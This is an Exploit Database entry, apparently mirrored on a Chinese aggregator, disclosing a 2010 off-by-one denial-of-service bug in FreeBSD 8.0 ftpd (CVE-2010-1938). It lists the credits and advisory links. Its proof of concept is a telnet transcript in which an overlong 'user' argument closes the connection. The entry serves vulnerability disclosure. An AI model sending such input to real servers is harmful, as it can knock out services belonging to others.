FreeBSD 8.0 – ‘ftpd’ (FreeBSD-SA-10:05) Off-By-One (PoC)

• Exploit Database
• 15 阅读

• 作者： Maksymilian Arciemowicz
  日期： 2010-05-27
• 类别：

  • dos
  平台：

  • freebsd
• 来源：https://www.exploit-db.com/exploits/12762/

• # FreeBSD 8.0 ftpd off-by one PoC (FreeBSD-SA-10:05)
  # CVE-2010-1938
  # FreeBSD-SA-10:05
  # Credit: Maksymilian Arciemowicz and Adam Zabrocki
  #
  # http://securityreason.com/achievement_securityalert/87
  # http://security.freebsd.org/advisories/FreeBSD-SA-10:05.opie.asc
  # http://blog.pi3.com.pl/?p=111
  #
  
  PoC:
  Connected to localhost.
  Escape character is '^]'.
  220 127.cx FTP server (Version 6.00LS) ready.
  user cx
  331 Password required for cx.
  user AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
  Connection closed by foreign host.
  
  - -- 
  Best Regards,
  - ------------------------
  pub 1024D/A6986BD6 2008-08-22
  uid Maksymilian Arciemowicz (cxib)
  <cxib@securityreason.com>
  sub 4096g/0889FA9A 2008-08-22
  
  http://securityreason.com
  http://securityreason.com/key/Arciemowicz.Maksymilian.gpg